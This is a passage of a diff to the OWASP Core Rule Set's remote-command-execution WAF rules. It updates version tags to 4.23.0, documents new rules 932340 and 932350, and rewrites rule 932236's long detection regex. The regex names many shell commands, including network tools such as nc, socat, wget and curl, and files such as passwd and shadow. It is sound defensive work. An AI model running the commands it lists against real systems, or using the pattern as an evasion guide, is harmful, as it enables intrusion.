REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i).\ # # .932250 (base rule, PL1, targets two and three character commands) # .932260 (base rule, PL1, targets known command word of length > 3 without evasion) +# .932340 (PL-1, matches commands with no arguments) +# .932350 (PL-3, matches commands with no arguments) # # .932240 (generic detection, PL2, targets generic evasion attempts) # .932236 (stricter sibling of 932230, 932235, 932250, 932260, PL2, @@ -1316,7 +1390,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS|XML:/* "@rx (?i)[\-0-9_a-z]+( tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-RCE',\ tag:'capec/1000/152/248/88',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.932240_matched_var_name=%{matched_var_name}',\ chain" @@ -1355,7 +1429,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx \{[^\s tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-RCE',\ tag:'capec/1000/152/248/88',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -1393,7 +1467,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx ;[\s\x tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-RCE',\ tag:'capec/1000/152/248/88',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -1429,7 +1503,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx ~[0-9] tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-RCE',\ tag:'capec/1000/152/248/88',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -1471,7 +1545,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)\r tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-RCE',\ tag:'capec/137/134',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -1504,7 +1578,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?is)\ tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-RCE',\ tag:'capec/137/134',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -1539,7 +1613,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?is)\ tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-RCE',\ tag:'capec/137/134',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -1560,6 +1634,8 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?is)\ # # .932250 (base rule, PL1, targets two and three character commands) # .932260 (base rule, PL1, targets known command word of length > 3 without evasion) +# .932340 (PL-1, matches commands with no arguments) +# .932350 (PL-3, matches commands with no arguments) # # .932240 (generic detection, PL2, targets generic evasion attempts) # .932236 (stricter sibling of 932230, 932235, 932250, 932260, PL2, @@ -1585,7 +1661,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?is)\ # (consult https://coreruleset.org/docs/development/regex_assembly/ for details): # crs-toolchain regex update 932236 # -SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:^|b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?y[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?x|(?:c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?v|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?l)|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[\s\x0b&\),<>\|]|$).*|[ls][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e|n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:(?:[\s\x0b&\),<>\|]|$).*|o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t)|[\n\r;=`\{]|\|\|?|&&?|\$(?:\(\(?|[\[\{])|<(?:\(|<<)|>\(|\([\s\x0b]*\))[\s\x0b]*(?:[\$\{]|(?:[\s\x0b]*\(|!)[\s\x0b]*|[0-9A-Z_a-z]+=(?:[^\s\x0b]*|\$(?:.*|.*)|[<>].*|'[^']*'|\"[^\"]*\")[\s\x0b]+)*[\s\x0b]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:7z(?:[\s\x0b&\),<>\|]|$|[arx](?:[\s\x0b&\),<>\|]|$))|a(?:a-[^\s\x0b]{1,10}\b|(?:b|w[ks]|l(?:ias|pine)|tobm|xel)(?:[\s\x0b&\),<>\|]|$)|p(?:t(?:[\s\x0b&\),<>\|]|$|-get)|parmor_[^\s\x0b]{1,10}\b)|r(?:[\s\x0b&\),<>\|]|$|j(?:[\s\x0b&\),<>\|]|$|-register|disp)|(?:p|ch)(?:[\s\x0b&\),<>\|]|$)|ia2c)|s(?:h(?:[\s\x0b&\),<>\|]|$)|cii(?:-xfr|85)|pell)|dd(?:group|user)|getty|nsible|u(?:ditctl|repot|search))|b(?:z(?:(?:z|c(?:at|mp))(?:[\s\x0b&\),<>\|]|$)|diff|e(?:grep|xe(?:[\s\x0b&\),<>\|]|$))|f?grep|ip2(?:[\s\x0b&\),<>\|]|$|recover)|less|more)|a(?:s(?:e(?:32|64|n(?:ame(?:[\s\x0b&\),<>\|]|$)|c))|h(?:[\s\x0b&\),<>\|]|$))|tch(?:[\s\x0b&\),<>\|]|$))|lkid(?:[\s\x0b&\),<>\|]|$)|pftrace|r(?:eaksw|(?:idge|wap)(?:[\s\x0b&\),<>\|]|$))|sd(?:cat|iff|tar)|u(?:iltin|n(?:dler(?:[\s\x0b&\),<>\|]|$)|zip2)|s(?:ctl|ybox))|y(?:ebug|obu(?:[\s\x0b&\),<>\|]|$)))|c(?:[89]9(?:[\s\x0b&\),<>\|]|$|-gcc)|(?:a(?:t|ncel|psh)|c|mp)(?:[\s\x0b&\),<>\|]|$)|p(?:[\s\x0b&\),<>\|]|$|(?:an|io)(?:[\s\x0b&\),<>\|]|$)|ulimit)|s(?:(?:h|cli)(?:[\s\x0b&\),<>\|]|$)|plit|vtool)|u(?:(?:t|rl)(?:[\s\x0b&\),<>\|]|$)|psfilter)|ertbot|h(?:(?:(?:att|di)r|mod|o(?:om|wn)|root|sh)(?:[\s\x0b&\),<>\|]|$)|e(?:ck_(?:by_ssh|cups|log|memory|raid|s(?:sl_cert|tatusfile))|f(?:[\s\x0b&\),\-<>\|]|$))|(?:flag|pas)s|g(?:passwd|rp(?:[\s\x0b&\),<>\|]|$)))|lang(?:\+\+|[\s\x0b&\),<>\|]|$)|o(?:bc(?:[\s\x0b&\),<>\|]|$|run)|lumn(?:[\s\x0b&\),<>\|]|$)|m(?:m(?:[\s\x0b&\),<>\|]|$|and(?:[\s\x0b&\),<>\|]|$))|p(?:oser|ress)(?:[\s\x0b&\),<>\|]|$))|proc|w(?:say|think))|r(?:ash(?:[\s\x0b&\),<>\|]|$)|ontab))|d(?:(?:[dfu]|i(?:(?:alo)?g|ff)|ash|vips)(?:[\s\x0b&\),<>\|]|$)|hclient|m(?:esg(?:[\s\x0b&\),<>\|]|$)|idecode|setup)|o(?:(?:as|ne)(?:[\s\x0b&\),<>\|]|$)|cker(?:[\s\x0b&\),\-<>\|]|$)|sbox)|pkg(?:[\s\x0b&\),\-<>\|]|$))|e(?:(?:b|qn|cho|fax|grep|macs|val)(?:[\s\x0b&\),<>\|]|$)|n(?:v(?:[\s\x0b&\),<>\|]|$|-update)|d(?:if|sw)(?:[\s\x0b&\),<>\|]|$))|s(?:[\s\x0b&\),<>\|]|$|(?:h|ac)(?:[\s\x0b&\),<>\|]|$))|x(?:[\s\x0b&\),<>\|]|$|(?:ec|p(?:and|(?:ec|or)t|r))(?:[\s\x0b&\),<>\|]|$)|iftool)|2fsck|asy_install)|f(?:(?:c|mt|etch|lock|unction)(?:[\s\x0b&\),<>\|]|$)|d(?:[\s\x0b&\),<>\|]|$|(?:find|isk)(?:[\s\x0b&\),<>\|]|$)|u?mount)|g(?:[\s\x0b&\),<>\|]|$|rep(?:[\s\x0b&\),<>\|]|$))|i(?:[\s\x0b&\),<>\|]|$|letest|(?:n(?:d|ger)|sh)(?:[\s\x0b&\),<>\|]|$))|tp(?:[\s\x0b&\),<>\|]|$|stats|who)|acter|o(?:ld(?:[\s\x0b&\),<>\|]|$)|reach)|ping(?:[\s\x0b&\),6<>\|]|$))|g(?:c(?:c[^\s\x0b]{1,10}\b|ore(?:[\s\x0b&\),<>\|]|$))|(?:db|i(?:t|mp|nsh)|o|pg|awk|z(?:cat|exe|ip))(?:[\s\x0b&\),<>\|]|$)|e(?:m(?:[\s\x0b&\),<>\|]|$)|ni(?:e(?:[\s\x0b&\),<>\|]|$)|soimage)|t(?:cap|facl(?:[\s\x0b&\),<>\|]|$)))|hc(?:[\s\x0b&\),<>\|]|$|-(?:[\s\x0b&\),<>\|]|$)|i(?:[\s\x0b&\),\-<>\|]|$))|r(?:c(?:[\s\x0b&\),<>\|]|$|at(?:[\s\x0b&\),<>\|]|$))|ep(?:[\s\x0b&\),<>\|]|$)|oup(?:[\s\x0b&\),<>\|]|$|mod))|tester|unzip)|h(?:(?:d|up|i(?:ghlight|story))(?:[\s\x0b&\),<>\|]|$)|e(?:ad(?:[\s\x0b&\),<>\|]|$)|xdump)|ost(?:id|name)|ping3|t(?:digest|op(?:[\s\x0b&\),<>\|]|$)|passwd))|i(?:p(?:[\s\x0b&\),<>\|]|$|6?tables|config|p(?:eveprinter|find|tool))|(?:rb|conv)(?:[\s\x0b&\),<>\|]|$)|f(?:config|top(?:[\s\x0b&\),<>\|]|$))|onice|spell)|j(?:(?:js|q|exec)(?:[\s\x0b&\),<>\|]|$)|o(?:(?:bs|in)(?:[\s\x0b&\),<>\|]|$)|urnalctl)|runscript)|k(?:s(?:h(?:[\s\x0b&\),<>\|]|$)|shell)|ill(?:[\s\x0b&\),<>\|]|$|all)|nife(?:[\s\x0b&\),<>\|]|$))|l(?:d(?:[\s\x0b&\),<>\|]|$|d(?:[\s\x0b&\),<>\|]|$)|config)|(?:[np]|inks|ynx)(?:[\s\x0b&\),<>\|]|$)|s(?:[\s\x0b&\),<>\|]|$|(?:-F|cpu|hw|mod|of|pci|usb)(?:[\s\x0b&\),<>\|]|$)|b_release)|ua(?:[\s\x0b&\),<>\|]|$|(?:la)?tex)|z(?:4(?:[\s\x0b&\),<>\|]|$|c(?:[\s\x0b&\),<>\|]|$|at))|(?:c(?:at|mp))?(?:[\s\x0b&\),<>\|]|$)|diff|[ef]?grep|less|m(?:a(?:[\s\x0b&\),<>\|]|$|dec|info)|ore))|a(?:st(?:[\s\x0b&\),<>\|]|$|comm(?:[\s\x0b&\),<>\|]|$)|log(?:in)?)|tex(?:[\s\x0b&\),<>\|]|$))|ess(?:[\s\x0b&\),<>\|]|$|echo|(?:fil|pip)e)|ftp(?:[\s\x0b&\),<>\|]|$|get)|o(?:(?:ca(?:l|te)|ok)(?:[\s\x0b&\),<>\|]|$)|g(?:inctl|(?:nam|sav)e)|setup)|trace|wp-(?:d(?:ownload|ump)|mirror|request))|m(?:a(?:(?:n|il[qx]|ke|wk)(?:[\s\x0b&\),<>\|]|$)|ster\.passwd)|(?:tr|v|utt)(?:[\s\x0b&\),<>\|]|$)|k(?:(?:dir|nod)(?:[\s\x0b&\),<>\|]|$)|fifo|temp)|locate|o(?:squitto|unt(?:[\s\x0b&\),<>\|]|$))|sg(?:attrib|c(?:at|onv)|filter|merge|uniq)|ysql(?:[\s\x0b&\),<>\|]|$|admin|dump(?:slow)?|hotcopy|show))|n(?:c(?:[\s\x0b&\),<>\|]|$|\.(?:openbsd|traditional)|at(?:[\s\x0b&\),<>\|]|$))|e(?:t(?:[\s\x0b&\),<>\|]|$|(?:c|st)at|kit-ftp|plan)|ofetch)|(?:l|p(?:m|ing)|a(?:no|sm|wk)|ice|o(?:de|hup)|roff)(?:[\s\x0b&\),<>\|]|$)|m(?:[\s\x0b&\),<>\|]|$|ap(?:[\s\x0b&\),<>\|]|$))|s(?:enter|lookup|tat(?:[\s\x0b&\),<>\|]|$)))|o(?:(?:d|ctave)(?:[\s\x0b&\),<>\|]|$)|nintr|p(?:en(?:ssl|v(?:pn|t))|kg(?:[\s\x0b&\),<>\|]|$)))|p(?:a(?:(?:x|rted|tch)(?:[\s\x0b&\),<>\|]|$)|s(?:swd|te(?:[\s\x0b&\),<>\|]|$)))|d(?:b(?:[\s\x0b&\),<>\|]|$|2mb|3(?:[\s\x0b&\),\.<>\|]|$))|f(?:la)?tex|ksh(?:[\s\x0b&\),<>\|]|$))|f(?:[\s\x0b&\),<>\|]|$|tp(?:[\s\x0b&\),<>\|]|$))|i(?:c(?:[\s\x0b&\),<>\|]|$|o(?:[\s\x0b&\),<>\|]|$))|p(?:[^\s\x0b]{1,10}\b|[\s\x0b&\),<>\|]|$)|dstat|(?:gz|ng6?)(?:[\s\x0b&\),<>\|]|$))|k(?:g(?:[\s\x0b&\),<>\|]|$|_?info)|exec|ill(?:[\s\x0b&\),<>\|]|$))|r(?:[\s\x0b&\),<>\|]|$|y(?:[\s\x0b&\),<>\|]|$)|int(?:env|f(?:[\s\x0b&\),<>\|]|$)))|t(?:x(?:[\s\x0b&\),<>\|]|$)|ar(?:[\s\x0b&\),<>\|]|$|diff|grep))|wd(?:[\s\x0b&\),<>\|]|$|\.db)|(?:xz|grep|opd|u(?:ppet|shd))(?:[\s\x0b&\),<>\|]|$)|er(?:(?:f|ms)(?:[\s\x0b&\),<>\|]|$)|l(?:5?(?:[\s\x0b&\),<>\|]|$)|sh))|hp(?:-cgi|[57](?:[\s\x0b&\),<>\|]|$))|s(?:(?:ed|ql)(?:[\s\x0b&\),<>\|]|$)|ftp)|y(?:3?versions|thon(?:[23]|[^\s\x0b]{1,10}\b)))|r(?:(?:a(?:r|k[eu])|bash|nano|oute|vi(?:ew|m))(?:[\s\x0b&\),<>\|]|$)|c(?:[\s\x0b&\),<>\|]|$|p(?:[\s\x0b&\),<>\|]|$))|e(?:d(?:[\s\x0b&\),<>\|]|$|carpet(?:[\s\x0b&\),<>\|]|$))|(?:v|boot|place)(?:[\s\x0b&\),<>\|]|$)|a(?:delf|lpath)|stic)|m(?:[\s\x0b&\),<>\|]|$|t(?:[\s\x0b&\),<>\|]|$|-(?:dump|tar))|dir(?:[\s\x0b&\),<>\|]|$)|user)|pm(?:[\s\x0b&\),<>\|]|$|db(?:[\s\x0b&\),<>\|]|$)|(?:quer|verif)y)|l(?:ogin|wrap)|sync(?:-ssl|[\s\x0b&\),<>\|]|$)|u(?:by[^\s\x0b]{1,10}\b|n(?:-(?:mailcap|parts)|c(?:[\s\x0b&\),<>\|]|$))))|s(?:(?:c(?:p|hed|ript)|g|ash|diff|(?:ft|na)p|l(?:eep|sh))(?:[\s\x0b&\),<>\|]|$)|e(?:(?:d|ndmail|rvice)(?:[\s\x0b&\),<>\|]|$)|t(?:[\s\x0b&\),<>\|]|$|arch|cap|env|facl(?:[\s\x0b&\),<>\|]|$)|sid))|h(?:[\s\x0b&\),<>\|]|$|\.distrib|(?:adow|ells|u(?:f|tdown))(?:[\s\x0b&\),<>\|]|$))|sh(?:[\s\x0b&\),<>\|]|$|-(?:a(?:dd|gent)|copy-id|key(?:ge|sca)n)|pass)|u(?:[\s\x0b&\),<>\|]|$|do(?:-rs|[\s\x0b&\),<>_\|]|$|edit|replay))|vn(?:[\s\x0b&\),<>\|]|$|a(?:dmin|uthz)|bench|dumpfilter|fsfs|look|mucc|rdump|s(?:erve|ync)|version)|mbclient|o(?:cat(?:[\s\x0b&\),<>\|]|$)|elim)|p(?:lit(?:[\s\x0b&\),<>\|]|$)|wd\.db)|qlite3|t(?:art-stop-daemon|d(?:buf|err|in(?:[\s\x0b&\),<>\|]|$)|out)|r(?:ace|ings(?:[\s\x0b&\),<>\|]|$)))|ys(?:ctl|tem(?:ctl|d-resolve)))|t(?:a(?:[cr](?:[\s\x0b&\),<>\|]|$)|il(?:[\s\x0b&\),<>\|]|$|f(?:[\s\x0b&\),<>\|]|$))|skset)|(?:bl|o(?:p|uch)|ftp|mux)(?:[\s\x0b&\),<>\|]|$)|c(?:p(?:[\s\x0b&\),<>\|]|$|dump|ing|traceroute)|l?sh(?:[\s\x0b&\),<>\|]|$))|e(?:[ex](?:[\s\x0b&\),<>\|]|$)|lnet)|i(?:c(?:[\s\x0b&\),<>\|]|$)|medatectl)|r(?:aceroute6?|off(?:[\s\x0b&\),<>\|]|$))|shark)|u(?:dp(?:[\s\x0b&\),<>\|]|$)|l(?:[\s\x0b&\),<>\|]|$|imit(?:[\s\x0b&\),<>\|]|$))|n(?:(?:compress|iq|rar|s(?:et|hare)|xz)(?:[\s\x0b&\),<>\|]|$)|expand|l(?:ink(?:[\s\x0b&\),<>\|]|$)|z(?:4(?:[\s\x0b&\),<>\|]|$)|ma))|pigz|z(?:ip(?:[\s\x0b&\),<>\|]|$)|std))|pdate-alternatives|ser(?:(?:ad|mo)d|del)|u(?:de|en)code)|v(?:i(?:m(?:[\s\x0b&\),<>\|]|$|diff)|(?:gr|pw|rsh)(?:[\s\x0b&\),<>\|]|$)|sudo(?:-rs)?)|algrind|olatility(?:[\s\x0b&\),<>\|]|$))|w(?:(?:3m|c|atch|get)(?:[\s\x0b&\),<>\|]|$)|h(?:iptail(?:[\s\x0b&\),<>\|]|$)|oami)|i(?:reshark|sh(?:[\s\x0b&\),<>\|]|$)))|x(?:(?:(?:x|pa)d|args|term)(?:[\s\x0b&\),<>\|]|$)|z(?:[\s\x0b&\),<>\|]|$|c(?:at|mp)(?:[\s\x0b&\),<>\|]|$)|d(?:ec(?:[\s\x0b&\),<>\|]|$)|iff)|[ef]?grep|less|more)|e(?:latex|tex(?:[\s\x0b&\),<>\|]|$))|mo(?:dmap|re(?:[\s\x0b&\),<>\|]|$)))|y(?:um|arn|elp)(?:[\s\x0b&\),<>\|]|$)|z(?:ip(?:[\s\x0b&\),<>\|]|$|c(?:loak|mp)|details|grep|info|(?:merg|not)e|split|tool)|s(?:h(?:[\s\x0b&\),<>\|]|$)|oelim|td(?:[\s\x0b&\),<>\|]|$|(?:ca|m)t|grep|less))|athura|(?:c(?:at|mp)|diff|grep|less|run)(?:[\s\x0b&\),<>\|]|$)|e(?:grep|ro(?:[\s\x0b&\),<>\|]|$))|fgrep|mo(?:dload|re(?:[\s\x0b&\),<>\|]|$))|ypper))" \ +SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:^|b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?y[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?x|(?:c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?v|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?l)|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[\s\x0b&\),<>\|].*|[ls][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e|n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?: